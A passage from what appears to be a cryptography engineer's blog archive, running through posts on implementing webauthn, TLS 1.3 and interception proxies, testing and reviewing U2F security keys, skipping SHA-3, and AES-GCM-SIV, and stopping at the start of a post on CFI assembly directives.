The id field is optional and it sets the relying party ID (RP ID) of the credential. This is the domain name associated with the key and it defaults to the domain that’s creating the key. It can only be overridden to set it within the eTLD+1 of the current domain—like a cookie.

All these fields are required. However, like the previous chunk, they’re currently discarded and intended for forthcoming CTAP2 tokens.

The id identifies an account. A given CTAP2 token should not store two keys for the same RP ID and user ID. However, it’s possible that CTAP2 keys will allow blind enumeration of user IDs given physical possession of the token. (We have to see how that part of the CTAP2 spec is implemented in practice.) Therefore, you don’t want to store a username in the id field. Instead you could do something like HMAC-SHA256(key = server-side-secret, input = username)[:16]. (Although you’ll need a reverse index in the future if you want to use CTAP2 tokens in 1st-factor mode.)

The name and displayName are again strings intended for a future account chooser UI that doesn’t currently exist.

The challenge field for a new key is a little complex. The webauthn spec is very clear that this must be a strong, server-generated nonce and, for the assertion request which we’ll get to next, that’s correct. Also, if you’re checking attestation then this challenge is your only assurance of freshness, so you’ll want it in that case too.

However, as I mentioned above, it’s far from clear how well attestation will work outside of a controlled environment and I recommend that you ignore it in the general case. Given that, the utility of the challenge when creating a key is questionable. Generated U2F keys don’t sign over it and, while CTAP2 keys have the option of covering it with a self-signature, it remains to be seen whether any will actually do that.

One advantage that it does bring is that it stops CSRF attacks from registering a new key. But, if you don’t have a solid, general solution to CSRF already then you have far larger security issues.

Thus, since it’s easy and you’ll need it for assertions anyway, I still recommend that you generate a 16- or 32-byte nonce on the server as the spec suggests. I just thought that you should be aware that the benefit is a little fuzzier than you might imagine.

This enumerates the types of public keys that the server can process. The type field is always public-key and the alg comes from the IANA COSE list. The value -7 means ECDSA with P-256, which is effectively mandatory since it’s what all U2F tokens implement. At the moment, that’s the only value that makes sense although there might be some TPM-based implementations in the future that use RSA.

The timeout specifies how many milliseconds to wait for the user to select a token before returning an error.

The excludeCredentials is something that can be ignored while you get something working, but which you’ll have to circle back and read the spec on before deploying anything real. It allows you to exclude tokens that the user has already created a key on when adding new keys.

The promise will, if everything goes well, resolve to a PublicKeyCredential, the response member of which is an AuthenticatorAttestationResponse. I’m not going to pointlessly rewrite all the server-side processing steps from the spec here but I will note a couple of things:

Firstly, if you don’t know what token-binding is, that’s fine: ignore it. Same goes for extensions unless you previously supported the U2F API, in which case see the section below. I also suggest that you ignore the parts dealing with attestation (see above), which eliminates 95% of the complexity. Lastly, while I recommend following the remaining steps, see the bit above about the challenge parameter and don’t erroneously believe that checking, say, the origin member of the JSON is more meaningful than it is.

I’ll also mention something about all the different formats in play here: In order to process webauthn, you’ll end up dealing with JSON, ASN.1, bespoke binary formats, and CBOR. You may not have even heard of the last of those but CBOR is yet another serialisation format, joining Protocol Buffers, Msgpack, Thrift, Cap’n Proto, JSON, ASN.1, Avro, BSON, …. Whatever you might think of the IETF defining another format rather than using any of the numerous existing ones, you will have to deal with it to support webauthn, and you’ll have to deal with COSE, the CBOR translation of JOSE/JWT. You don’t have to support tags or indefinite lengths in CBOR though because the CTAP2 canonicalisation format forbids them.

The problem is that there’s going to be a lot of people having to implement converters from COSE key format to something that their crypto library accepts. Maybe I should start a GitHub repo of sample code for that in various libraries. But, short of that, here’s a quick reference to help you navigate all the different formats in play:

COSE Key

Used in: the public key in the attested credential data when creating a key. You have to parse this because you need the public key in order to check assertions.
Format: a CBOR map, defined here. However, you’ll struggle to figure out, concretely, what the keys in that map are from the RFC so, for reference, if you’re decoding a P-256 key you should expect these entries in the map: 1 (key type) = 2 (elliptic curve, x&y), 3 (algorithm) = -7 (ECDSA with SHA-256), -1 (curve) = 1 (P-256), and then x and y coordinates are 32-byte values with keys -2 and -3, respectively.
How to recognise: the first nibble is 0xa, for a small CBOR map.

X9.62 key

Used in: lots of things, this is the standard format for EC public keys. Contained within the SPKI format, which is used by Web Crypto and X.509.
Format: a type byte (0x04 for standard, uncompressed keys), followed by x and y values.
How to recognise: for P-256, it’s 65 bytes long and start with 0x04. (There’s also a compressed version of X9.62 but it’s exceedingly rare.)

SPKI

Used in: X.509 and Web Crypto.
Format: an ASN.1 structure called SubjectPublicKeyInfo: an algorithm identifier followed by a lump of bytes in an algorithm-specific format, which is X9.62 for elliptic-curve keys.
How to recognise: starts with 0x30.

ASN.1 signatures

Used in: nearly everything that deals with ECDSA signatures.
Format: an ASN.1 SEQUENCE containing two INTEGER values for ECDSA’s r and s values.
How to recognise: starts with 0x30 and you’re expecting a signature, not a key.

“Raw” signatures

Used in: Web Crypto.
Format: a pair of 32-byte values (for P-256).
How to recognise: 64 bytes long.

Getting assertions

Once you have one (or more) keys registered for a user you can challenge them for a signature. Typically this is done at login time although CTAP2 envisions user verifying tokens that take a fingerprint or PIN number, so signatures from those devices could replace reauthentication requests. (I.e. those times when a site asks you to re-enter your password before showing particularly sensitive information.)

When getting an assertion, the challenge (i.e. nonce) really must be securely generated at the server—there’s none of the equivocation as with generation.

The credentialID values are those extracted from the attested credential data from the registration.

Again, there’s no need for me to reiterate the processing steps already enumerated in the spec except to repeat that you can ignore token-binding if you don’t know what it is, and to reference the comments above about signature counters. If you implement the signature counter check, you should think through how the user will experience various scenarios and ensure that you’re monitoring metrics for the number of counter failures observed. (I don’t think we know, in practice, how often counter writes will be lost, or counters will be corrupted.)

Supporting keys created with the U2F API

This is just for the handful of sites that supported Security Keys using the older, U2F API. If you have keys that were registered with that API then they aren’t immediately going to work with webauthn because the AppID from U2F is a URL, but the relying party ID in webauthn is just a domain. Thus the same origin is considered to be a different relying party when using U2F and webauthn and the keys won’t be accepted. (Just the same as if you tried to use a credential ID from a different site.)

However, there is a solution to this: in the publicKey argument of the get call add an extensions field containing a dict with a key appid whose value is the AppID of your U2F keys. This can be done uniformly for all keys if you wish since both the relying party ID and AppID will be tried when this is asserted. With this in place, keys registered with U2F should work with webauthn.

There is no way to create a U2F key with webauthn however. So if you rollout webauthn support, have users create keys with webauthn, and have to roll it back for some reason, those new keys will not work with the U2F API. So complete the transition to webauthn of your login process first, then transition registration.

Concluding remarks

It’s exciting to see webauthn support coming to most browsers this year. I get to use Security Keys with about the same number of sites as I use SMS OTP with, and I use Security Keys anywhere I can. While I, like everyone technical, assumes that I’m less likely to get phished than most, I’m still human. So I hope that wide-spread support for webauthn encourages more sites to support Security Keys.

Challenges remain, though. Probably the most obvious is that NFC is the ideal interface for mobile devices, but it doesn’t work with iOS. Bluetooth works for both Android and iOS, but requires a battery and isn’t as frictionless.

Security keys will probably remain the domain of the more security conscious in the short-term since, with CTAP1, they can only be an additional authentication step. But I hope to see CTAP2 tokens generally available this year with fingerprint readers or PIN support. It might be that, in a few years time, a significant number of people have a passwordless experience with at least one site that they use regularly. That’ll be exciting.

TLS 1.3 and Proxies

I'll generally ignore the internet froth in a given week as much as possible, but when Her Majesty's Government starts repeating misunderstandings about TLS 1.3 it is necessary to write something, if only to have a pointer ready for when people start citing it as evidence.

The first misunderstanding in the piece is the claim that it's possible for man-in-the-middle proxies to selectively proxy TLS 1.2 connections, but not TLS 1.3 connections because the latter encrypts certificates.

The TLS 1.2 proxy behaviour that's presumed here is the following: the proxy forwards the client's ClientHello message to the server and inspects the resulting ServerHello and certificates. Based on the name in the certificate, the proxy may “drop out” of the connection (i.e. allow the client and server to communicate directly) or may choose to interpose itself, answering the client with an alternative ServerHello and the server with an alternative ClientKeyExchange, negotiating different encrypted sessions with each and forwarding so that it can see the plaintext of the connection. In order to satisfy the client in this case the client must trust the proxy, but that's taken care of in the enterprise setting by installing a root CA on the client. (Or, in Syria, by hoping that users click through the the certificate error.)

While there do exist products that attempt to do this, they break repeatedly because it's a fundamentally flawed design: by forwarding the ClientHello to the server, the proxy has committed to supporting every feature that the client advertises because, if the server selects a given feature, it's too late for the proxy to change its mind. Therefore, with every new cipher suite, new curve, and new extension introduced, a proxy that does this finds that it cannot understand the connection that it's trying to interpose.

One option that some proxies take is to try and heuristically detect when it can't support a connection and fail open. However, if you believe that your proxy is a strong defense against something then failing open is a bit of problem.

Thus another avenue that some proxies have tried is to use the same heuristics to detect unsupported connections, discard the incomplete, outgoing connection, and start another by sending a ClientHello that only includes features that the proxy supports. That's unfortunate for the server because it doubles its handshaking cost, but gives the proxy a usable connection.

However, both those tricks only slow down the rate at which customers lurch from outage to outage. The heuristics are necessarily imprecise because TLS extensions can change anything about a connection after the ClientHello and some additions to TLS have memorably broken them, leading to confused proxies cutting enterprises off from the internet.

So the idea that selective proxying based on the server certificate ever functioned is false. A proxy can, with all versions of TLS, examine a ClientHello and decide to proxy the connection or not but, if it does so, it must craft a fresh ClientHello to send to the server containing only features that it supports. Making assumptions about any TLS message after a ClientHello that you didn't craft is invalid. Since, in practice, this has not been as obvious as the designers of TLS had imagined, the 1.3 draft has a section laying out these requirements.

Sadly, it's precisely this sort of proxy misbehaviour that has delayed TLS 1.3 for over a year while my colleagues (David Benjamin and Steven Valdez) repeatedly deployed experiments and measured success rates of different serialisations. In the end we found that making TLS 1.3 look like a TLS 1.2 resumption solved a huge number of problems, suggesting that many proxies blindly pass through such connections. (Which should, again, make one wonder about what security properties they're providing.)

But, given all that, you might ponder why we bothered encrypting certificates? Partly it's one component of an effort to make browsing more private but, more concretely, it's because anything not encrypted suffers these problems. TLS 1.3 was difficult to deploy because TLS's handshake is, perforce, exposed to the network. The idea that we should make TLS a little more efficient by compressing certificates has been bouncing around for many years. But it's only with TLS 1.3 that we might make it happen because everyone expected to hit another swamp of proxy issues if we tried it without encrypting certificates first.

It's also worth examining the assumption behind waiting for the server certificate before making an interception decision: that the client might be malicious and attempt to fool the proxy but (to quote the article) the certificate is “tightly bound to the server we’re actually interacting with”. The problem here is that a certificate for any given site, and a valid signature over a ServerKeyExchange from that certificate, is easily available: just connect to the server and it'll send it to you. Therefore if you're worried about malware, how is it that the malware C&C server won't just reply with a certificate for a reputable site? The malware client, after all, can be crafted to compensate for any such trickery. Unless the proxy is interposing and performing the cryptographic checks, then the server certificate isn't tightly bound to anything at all and the whole reason for the design seems flawed.

On that subject, I'll briefly mention the fact that HTTPS proxies aren't always so great at performing cryptographic checks. (We recently notified a major proxy vendor that their product didn't appear to validate certificates at all. We were informed that they can validate certificates, it's just disabled by default. It's unclear what fraction of their customers are aware of that.)

Onto the second claim of the article: that TLS 1.3 is incompatible with PCI-DSS (credit card standards) and HIPAA (US healthcare regulation). No reasoning is given for the claim, so let's take a look:

Many PCI-DSS compliant systems use TLS 1.2, primarily stemming from requirement 4.1: “use strong cryptography and security protocols to safeguard sensitive cardholder data during transmission over open, public networks, including a) only trusted keys and certificates are accepted, b) the protocol in use only supports secure versions or configurations, and c) the encryption strength is appropriate for the encryption methodology in use”.

As you can see, the PCI-DSS requirements are general enough to adapt to new versions of TLS and, if TLS 1.2 is sufficient, then TLS 1.3 is better. (Even those misunderstanding aspects of TLS 1.3 are saying it's stronger than 1.2.)

HIPAA is likewise, requiring that one must “implement technical security measures to guard against unauthorized access to electronic protected health information that is being transmitted over an electronic communications network”.

TLS 1.3 is enabled in Chrome 65, which is rolling out now. It is a major improvement in TLS and lets us eliminate session-ticket encryption keys as a mass-decryption threat, which both PCI-DSS- and HIPAA-compliance experts should take great interest in. It does not require special measures by proxies—they need only implement TLS 1.2 correctly.

Testing Security Keys

Last time I reviewed various security keys at a fairly superficial level: basic function, physical characteristics etc. This post considers lower-level behaviour.

Security Keys implement the FIDO U2F spec, which borrows a lot from ISO 7816-4. Each possible transport (i.e. USB, NFC, or Bluetooth) has its own spec for how to encapsulate the U2F messages over that transport (e.g. here's the USB one). FIDO is working on much more complex (and more capable) second versions of these specs, but currently all security keys implement the basic ones.

In essence, the U2F spec only contains three functions: Register, Authenticate, and Check. Register creates a new key-pair. Authenticate signs with an existing key-pair, after the user confirms physical presence, and Check confirms whether or not a key-pair is known to a security key.

In more detail, Register takes a 32-byte challenge and a 32-byte appID. These are intended to be SHA-256 hashes, but are opaque and can be anything. The challenge acts as a nonce, while the appID is bound to the resulting key and represents the context of the key. For web browsers, the appID is the hash of a URL in the origin of the login page.

Register returns a P-256 public key, an opaque key handle, the security key's batch certificate, and a signature, by the public key in the certificate, of the challenge, appID, key handle, and public key. Since the security keys are small devices with limited storage, it's universally the case in the ones that I've looked at that the key handle is actually an encrypted private key, i.e. the token offloads storage of private keys. However, in theory, the key handle could just be an integer that indexes storage within the token.

Authenticate takes a challenge, an appID, and a key handle, verifies that the appID matches the value given to Register, and returns a signature, from the public key associated with that key handle, over the challenge and appID.

Check takes a key handle and an appID and returns a positive result if the key handle came from this security key and the appID matches.

Given that, there are a number of properties that should hold. Some of the most critical:

But there are a number of other things that would be nice to test:

So given all those desirable properties, how do various security keys manage?

Yubico

Easy one first: I can find no flaws in Yubico's U2F Security Key.

VASCO SecureClick

I've acquired one of these since the round-up of security keys that I did last time so I'll give a full introduction here. (See also Brad's review.)

This is a Bluetooth Low-Energy (BLE) token, which means that it works with both Android and iOS devices. For non-mobile devices, it includes a USB-A BLE dongle. The SecureClick uses a Chrome extension for configuring and pairing the dongle, which works across platforms. The dongle appears as a normal USB device until it sees a BLE signal from the token, at which point it “disconnects” and reconnects as a different device for actually doing the U2F operation. Once an operation that requires user-presence (i.e. a Register or Authenticate) has completed, the token powers down and the dongle disconnects and reconnects as the original USB device again.

If you're using Linux and you configure udev to grant access to the vendor ID & product ID of the token as it appears normally, nothing will work because the vendor ID and product ID are different when it's active. The Chrome extension will get very confused about this.

However, once I'd figured that out, everything else worked well. The problem, as is inherent with BLE devices, is that the token needs a battery that will run out eventually. (It takes a CR2012 and can be replaced.) VASCO claims that it can be used 10 times a day for two years, which seems plausible. I did run the battery out during testing, but testing involves a lot of operations. Like the Yubico, I did not find any problems with this token.

I did have it working with iOS, but it didn't work when I tried to check the battery level just now, and I'm not sure what changed. (Perhaps iOS 11?)

Feitian ePass

ASN.1 DER is designed to be a “distinguished” encoding, i.e. there should be a unique serialisation for a given value and all other representations are invalid. As such, numbers are supposed to be encoded minimally, with no leading zeros (unless necessary to make a number positive). Feitian doesn't get that right with this security key: numbers that start with 9 leading zero bits have an invalid zero byte at the beginning. Presumably, numbers starting with 17 zero bits have two invalid zero bytes at the beginning and so on, but I wasn't able to press the button enough times to get such an example. Thus something like one in 256 signatures produced by this security key are invalid.

Also, the final eight bytes of the key handle seem to be superfluous: you can change them to whatever value you like and the security key doesn't care. That is not immediately a problem, but it does beg the question: if they're not being used, what are they?

Lastly, the padding data in USB packets isn't zeroed. However, it's obviously just the previous contents of the transmit buffer, so there's nothing sensitive getting leaked.

Thetis

With this device, I can't test things like key handle mutability and whether the appID is being checked because of some odd behaviour. The response to the first Check is invalid, according to the spec: it returns status 0x9000 (“NO_ERROR”), when it should be 0x6985 or 0x6a80. After that, it starts rejecting all key handles (even valid ones) with 0x6a80 until it's unplugged and reinserted.

This device has the same non-minimal signature encoding issue as the Feitian ePass. Also, if you click too fast, this security key gets upset and rejects a few requests with status 0x6ffe.

USB padding bytes aren't zeroed, but appear to be parts of the request message and thus nothing interesting.

U2F Zero

A 1KiB ping message crashes this device (i.e. it stops responding to USB messages and needs to be unplugged and reinserted). Testing a corrupted key handle also crashes it and thus I wasn't able to run many tests.

KEY-ID / HyperFIDO

The Key-ID (and HyperFIDO devices, which have the same firmware, I think) have the same non-minimal encoding issue as the Feitian ePass, but also have a second ASN.1 flaw. In ASN.1 DER, if the most-significant bit of a number is set, that number is negative. If it's not supposed to be negative, then a zero pad byte is needed. I think what happened here is that, when testing the most-significant bit, the security key checks whether the first byte is > 0x80, but it should be checking whether it's >= 0x80. The upshot is the sometimes it produces signatures that contain negative numbers and are thus invalid.

USB padding bytes aren't zeroed, and include data that was not part of the request or response. It's unlikely to be material, but it does beg the question of where it comes from.

The wrapped keys also have some unfortunate properties. Firstly, bytes 16 through 31 are a function of the device and the appID, thus a given site can passively identify the same token when used by different accounts. Bytes 48 through 79 are unauthenticated and, when altered, everything still works except the signatures are wrong. That suggests that these bytes are the encrypted private key (or the encrypted seed to generate it). It's not obvious that there's any vulnerability from being able to tweak the private key like this, but all bytes of the key handle should be authenticated as a matter of best practice. Lastly, bytes 32 through 47 can't be arbitrarily manipulated, but can be substituted with the same bytes from a different key handle, which causes the signatures to be incorrect. I don't know what's going on there.

Overall, the key handle structure is sufficiently far from the obvious construction to cause worry, but not an obvious vulnerability.

Security Keys

Security Keys are (generally) USB-connected hardware fobs that are capable of key generation and oracle signing. Websites can “enroll” a security key by asking it to generate a public key bound to an “appId” (which is limited by the browser based on the site's origin). Later, when a user wants to log in, the website can send a challenge to the security key, which signs it to prove possession of the corresponding private key. By having a physical button, which must be pressed to enroll or sign, operations can't happen without user involvement. By having the security keys encrypt state and hand it to the website to store, they can be stateless(*) and robust.

(* well, they can almost be stateless, but there's a signature counter in the spec. Hopefully it'll go away in a future revision for that and other reasons.)

The point is that security keys are unphishable: a phisher can only get a signature for their appId which, because it's based on the origin, has to be invalid for the real site. Indeed, a user cannot be socially engineered into compromising themselves with a security key, short of them physically giving it to the attacker. This is a step up from app- or SMS-based two-factor authentication, which only solves password reuse. (And SMS has other issues.)

The W3C standard for security keys is still a work in progress, but sites can use them via the FIDO API today. In Chrome you can load an implementation of that API which forwards requests to an internal extension that handles the USB communication. If you do that, then there's a Firefox extension that implements the same API by running a local binary to handle it. (Although the Firefox extension appears to stop working with Firefox 57, based on reports.)

Google, GitHub, Facebook and Dropbox (and others) all support security keys this way. If you administer a G Suite domain, you can require security keys for your users. (“G Suite” is the new name for Gmail etc on a custom domain.)

But, to get all this, you need an actual security key, and probably two of them if you want a backup. (And a backup is a good idea, especially if you plan on dropping your phone number for account recovery.) So I did a search on Amazon for “U2F security key” and bought everything on the first page of results that was under $20 and available to ship now.

(Update: Brad Hill setup a page on GitHub that includes these reviews and his own.)

Yubico Security Key

Brand: Yubico, Firmware: Yubico, Chip: NXP, Price: $17.99, Connection: USB-A

Yubico is the leader in this space and their devices are the most common. They have a number of more expensive and more capable devices that some people might be familiar with, but this one only does U2F. The sensor is a capacitive so a light touch is sufficient to trigger it. You'll have no problems with this key, but it is the most expensive of the under $20 set.

Thetis U2F Security Key

Brand: Thetis, Firmware: Excelsecu, Chip: ?, Price: $13.95, Connection: USB-A

This security key is fashioned more like a USB thumb drive. The plastic inner part rotates within the outer metal shell and so the USB connector can be protected by it. The button is in the axis and is clicky, rather than capacitive, but doesn't require too much force to press. If you'll be throwing your security key in bags and worry about damaging them then perhaps this one will work well for you.

A minor nit is that the attestation certificate is signed with SHA-1. That doesn't really matter, but it suggests that the firmware writers aren't paying as much attention as one would hope. (I.e. it's a brown M&M.)

Feitian ePass

Brand: Feitian, Firmware: Feitian, Chip: NXP, Price: $16.99, Connection: USB-A, NFC

This one is very much like the Yubico, just a little fatter around the middle. Otherwise, it's also a sealed plastic body and capacitive touch sensor. The differences are a dollar and NFC support—which should let it work with Android. However, I haven't tested this feature.

I don't know what the opposite of a brown M&M is, but this security key is the only one here that has its metadata correctly registered with the FIDO Metadata Service.

U2F Zero

Brand: U2F Zero, Firmware: Conor Patrick, Chip: Atmel, Price: $8.99, Connection: USB-A

I did bend the rules a little to include this one: it wasn't immediately available when I did the main order from Amazon. But it's the only token on Amazon that has open source firmware (and hardware designs), and that was worth waiting for. It's also the cheapest of all the options here.

Sadly, I have to report that I can't quite recommend it because, in my laptop (a Chromebook Pixel), it's not thick enough to sit in the USB port correctly: Since it only has the “tongue” of a USB connector, it can move around in the port a fair bit. That's true of the other tokens too, but with the U2F Zero, unless I hold it just right, it fails to make proper contact. Since operating it requires pressing the button, it's almost unusable in my laptop.

However, it's fine with a couple of USB hubs that I have and in my desktop computer, so it might be fine for you. Depends how much you value the coolness factor of it being open-source.

KEY-ID FIDO U2F Security Key

Brand: KEY-ID, Firmware: Feitian(?), Chip: ?, Price: $12.00, Connection: USB-A

I photographed this one while plugged in in order to show the most obvious issue with this device: everyone will know when you're using it! Whenever it's plugged in, the green LED on the end is lit up and, although the saturation in the photo exaggerates the situation a little, it really is too bright. When it's waiting for a touch, it starts flashing too.

In addition, whenever I remove this from my desktop computer, the computer reboots. That suggests an electrical issue with the device itself—it's probably shorting something that shouldn't be shorted, like the USB power pin to ground, for example.

While this device is branded “KEY-ID”, I believe that the firmware is done by Feitian. There are similarities in certificate that match the Feitian device and, if you look up the FIDO certification, you find that Feitian registered a device called “KEY-ID FIDO® U2F Security Key”. Possibly Feitian decided against putting their brand on this.

(Update: Brad Hill, at least, reports no problems with these when using a MacBook.)

HyperFIDO Mini

Brand: HyperFIDO, Firmware: Feitian(?), Chip: ?, Price: $13.75, Connection: USB-A

By observation, this is physically identical to the KEY-ID device, save for the colour. It has the same green LED too (see above).

However, it manages to be worse. The KEY-ID device is highlighted in Amazon as a “new 2017 model”, and maybe this an example of the older model. Not only does it cause my computer to reliably reboot when removed (I suffered to bring you this review, dear reader), it also causes all devices on a USB hub to stop working when plugged in. When plugged into my laptop it does work—as long as you hold it up in the USB socket. The only saving grace is that, when you aren't pressing it upwards, at least the green LED doesn't light up.

HyperFIDO U2F Security Key

Brand: HyperFIDO, Firmware: Feitian(?), Chip: ?, Price: $9.98, Connection: USB-A

This HyperFIDO device is plastic so avoids the electrical issues of the KEY-ID and HyperFIDO Mini, above. It also avoids having an LED that can blind small children.

However, at least on the one that I received, the plastic USB part is only just small enough to fit into a USB socket. It takes a fair bit of force to insert and remove it. Also the end cap looks like it should be symmetrical and so able to go on either way around, but it doesn't quite work when upside down.

Once inserted, pressing the button doesn't take too much force, but it's enough to make the device bend worryingly in the socket. It doesn't actually appear to be a problem, but it adds a touch of anxiety to each use. Overall, it's cheap and you'll know it.

Those are the devices that matched my initial criteria. But, sometimes, $20 isn't going to be enough I'm afraid. These are some other security keys that I've ended up with:

Yubikey 4C

Brand: Yubico, Firmware: Yubico, Chip: NXP?, Price: $50 (direct from Yubico), Connection: USB-C

If you have a laptop that only has USB-C ports then a USB-A device is useless to you. Currently your only option is the Yubikey 4C at $50 a piece. This works well enough: the “button” is capacitive and triggers when you touch either of the contacts on the sides. The visual indicator is an LED that shines through the plastic at the very end.

Note that, as a full Yubikey, it can do more than just being a security key. Yubico have a site for that.

(Update: several people have mentioned in comments that this device wasn't very robust for them and had physical problems after some months. I can't confirm that, but there's always the option of a USB-A to USB-C adaptor. Just be careful to get one that'll work—the adaptor that I have doesn't hold “tongue-only” USB devices well enough.)

Many people lacking USB-A ports will have a Touch Bar, which includes a fingerprint sensor and secure element. One might spy an alternative (and cheaper solution) there. GitHub have published SoftU2F which does some of that but, from what I can tell, doesn't actually store keys in the secure element yet. However, in time, there might be a good answer for this.

(Update: the behaviour of SoftU2F might be changing.)

Yubikey Nano

Brand: Yubico, Firmware: Yubico, Chip: NXP?, Price: $50 (direct from Yubico), Connection: USB-A

Another $50 security key from Yubico, but I've included it because it's my preferred form-factor: this key is designed to sit semi-permanently inside the USB-A port. The edge is a capacitive touch sensor so you can trigger it by running your finger along it.

It does mean that you give up a USB port, but it also means that you've never rummaging around to find it.

(Note: newer Nanos look slightly different. See Yubico's page for a photo of the current design.)

Maybe Skip SHA-3

In 2005 and 2006, a series of significant results were published against SHA-1 [1][2][3]. These repeated break-throughs caused something of a crisis of faith as cryptographers questioned whether we knew how to build hash functions at all. After all, many hash functions from the 1990's had not aged well [1][2].

In the wake of this, NIST announced (PDF) a competition to develop SHA-3 in order to hedge the risk of SHA-2 falling. In 2012, Keccak (pronounced “ket-chak”, I believe) won (PDF) and became SHA-3. But the competition itself proved that we do know how to build hash functions: the series of results in 2005 didn't extend to SHA-2 and the SHA-3 process produced a number of hash functions, all of which are secure as far as we can tell. Thus, by the time it existed, it was no longer clear that SHA-3 was needed. Yet there is a natural tendency to assume that SHA-3 must be better than SHA-2 because the number is bigger.

As I've mentioned before, diversity of cryptographic primitives is expensive. It contributes to the exponential number of combinations that need to be tested and hardened; it draws on limited developer resources as multiple platforms typically need separate, optimised code; and it contributes to code-size, which is a worry again in the mobile age. SHA-3 is also slow, and is even slower than SHA-2 which is already a comparative laggard amongst crypto primitives.

SHA-3 did introduce something useful: extendable output functions (XOFs), in the form of the SHAKE algorithms. In an XOF, input is hashed and then an (effectively) unlimited amount of output can be produced from it. It's convenient, although the same effect can be produced for a limited amount of output using HKDF, or by hashing to a key and running ChaCha20 or AES-CTR.

Thus I believe that SHA-3 should probably not be used. It offers no compelling advantage over SHA-2 and brings many costs. The only argument that I can credit is that it's nice to have a backup hash function, but both SHA-256 and SHA-512 are commonly supported and have different cores. So we already have two secure hash functions deployed and I don't think we need another.

BLAKE2 is another new, secure hash function, but it at least offers much improved speed over SHA-2. Speed is important. Not only does it mean less CPU time spent on cryptography, it means that cryptography can be economically deployed in places where it couldn't be before. BLAKE2, however, has too many versions: eight at the current count (BLAKE2(X)?[sb](p)?). In response to complaints about speed, the Keccak team now have KangarooTwelve and MarsupilamiFourteen, which have a vector-based design for better performance. (Although a vector-based design can also be used to speed up SHA-2.)

So there are some interesting prospects for a future, faster replacement for SHA-2. But SHA-3 itself isn't one of them.

Update: two points came up in discussion about this. Firstly, what about length-extension? SHA-2 has the property that simply hashing a secret with some data is not a secure MAC construction, that's why we have HMAC. SHA-3 does not have this problem.

That is an advantage of SHA-3 because it means that people who don't know they need to use HMAC (with SHA-2) won't be caught out by it. Hopefully, in time, we end up with a hash function that has that property. But SHA-512/256, BLAKE2, K12, M14 and all the other SHA-3 candidates do have this property. In fact, it's implausible that any future hash function wouldn't.

Overall, I don't feel that solving length-extension is a sufficiently pressing concern that we should all invest in SHA-3 now, rather than a hash function that hopefully comes with more advantages. If it is a major concern for you now, try SHA-512/256—a member of the SHA-2 family.

The second point was that SHA-3 is just the first step towards a permutation-based future: SHA-3 has an elegant foundation that is suitable for implementing the full range of symmetric algorithms. In the future, a single optimised permutation function could be the basis of hashes, MACs, and AEADs, thus saving code size / die area and complexity. (E.g. STROBE.)

But skipping SHA-3 doesn't preclude any of that. SHA-3 is the hash standard itself, and even the Keccak team appear to be pushing K12 rather than SHA-3 now. It seems unlikely that a full set of primitives built around the Keccak permutation would choose to use the SHA-3 parameters at this point.

Indeed, SHA-3 adoption might inhibit that ecosystem by pushing it towards those bad parameters. (There was a thing about NIST tweaking the parameters at the end of the process if you want some background.)

One might argue that SHA-3 should be supported because you believe that it'll result in hardware implementations of the permutation and you hope that they'll be flexible enough to support what you really want to do with it. I'm not sure that would be the best approach even if your goal was to move to a permutation-based world. Instead I would nail down the whole family of primitives as you would like to see it and try to push small chips, where area is a major concern, to adopt it. Even then, the hash function in the family probably wouldn't be exactly SHA-3, but more like K12.

AES-GCM-SIV

AEADs combine encryption and authentication in a way that provides the properties that people generally expect when they “encrypt” something. This is great because, historically, handing people a block cipher and a hash function has resulted in a lot of bad and broken constructions. Standardising AEADs avoids this.

Common AEADs have a sharp edge though: you must never encrypt two different messages with the same key and nonce. Doing so generally violates the confidentiality of the two messages and might break much more.

There are some situations where obtaining a unique nonce is easy, for example in transport security where a simple counter can be used. (Due to poor design in TLS 1.2, some TLS implementations still managed to duplicate nonces. The answer there is to do what ChaCha20-Poly1305 does in TLS 1.2, and what everything does in TLS 1.3: make the nonce implicit. That means that any mistakes result in your code not interoperating, which should be noticed.)

But there are situations where ensuring nonce uniqueness is not trivial, generally where multiple machines are independently encrypting with the same key. A system for distributing nonces is complex and hard to have confidence in. Generating nonces randomly and depending on statistical uniqueness is reasonable, but only if the space of nonces is large enough. XSalsa20-Poly1305 (paper, code) has a 192-bit nonce and good performance across a range of CPUs. In many situations, using that with random nonces is a sound choice.

However, lots of chips now have hardware support for the AES-GCM AEAD, meaning that its performance and power use is hard to beat. Also, a 192-bit nonce results in a ~40% increase in overhead vs the 96-bit nonce of AES-GCM, which is undesirable in some contexts. (Overhead consists of the nonce and tag, thus the increase from 96- to 192-bit nonces is not 100%.)

But using random nonces in a 96-bit space isn't that comfortable. NIST recommends a limit of 232 messages when using random nonces with AES-GCM which, while quite large, is often not large enough not to have to worry about. Because of this, Shay Gueron, Yehuda Lindell and I have been working on AES-GCM-SIV (paper, spec): AES-GCM with some forgiveness. It uses the same primitives as AES-GCM, and thus enjoys the same hardware support, but it doesn't fail catastrophically if you repeat a nonce. Thus you can use random, 96-bit nonces with a far larger number of messages, or withstand a glitch in your nonce distribution scheme. (For precise numbers, see section 5.3 of the paper.)

There is a performance cost: AES-GCM-SIV encryption runs at about 70% the speed of AES-GCM, although decryption runs at the same speed. (Measured using current BoringSSL on an Intel Skylake chip with 8KiB messages.) But, in any situation where you don't have a watertight argument for nonce uniqueness, that might be pretty cheap compared to the alternative.

For example, both TLS and QUIC need to encrypt small messages at the server that can be decrypted by other servers. For TLS, these messages are the session tickets and, in QUIC, they are the source-address tokens. This is an example of a situation where many servers are independently encrypting with the same key and so Google's QUIC implementation is in the process of switching to using AES-GCM-SIV for source-address tokens. (Our TLS implementation may switch too in the future, although that will be more difficult because of existing APIs.)

AEADs that can withstand nonce duplication are called “nonce-misuse resistant” and that name appears to have caused some people to believe that they are infinitely resistant. I.e. that an unlimited number of messages can be encrypted with a fixed nonce with no loss in security. That is not the case, and the term wasn't defined that way originally by Rogaway and Shrimpton (nor does their SIV mode have that property). So it's important to emphasise that AES-GCM-SIV (and nonce-misuse resistant modes in general) are not a magic invulnerability shield. Figure four and section five of the the paper give precise bounds but, if in doubt, consider AES-GCM-SIV to be a safety net for accidental nonce duplication and otherwise treat it like a traditional AEAD.

AES-GCM-SIV is supported in BoringSSL now and, while one may not want to use the whole of BoringSSL, the core assembly is ISC licensed. Also, Shay has published reference, assembly and intrinsics versions for those who think AES-GCM-SIV might be useful to them.

CFI directives in assembly files

(This post uses x86-64 for illustration throughout. The fundamentals are similar for other platforms but will need some translation that I don't cover here.)

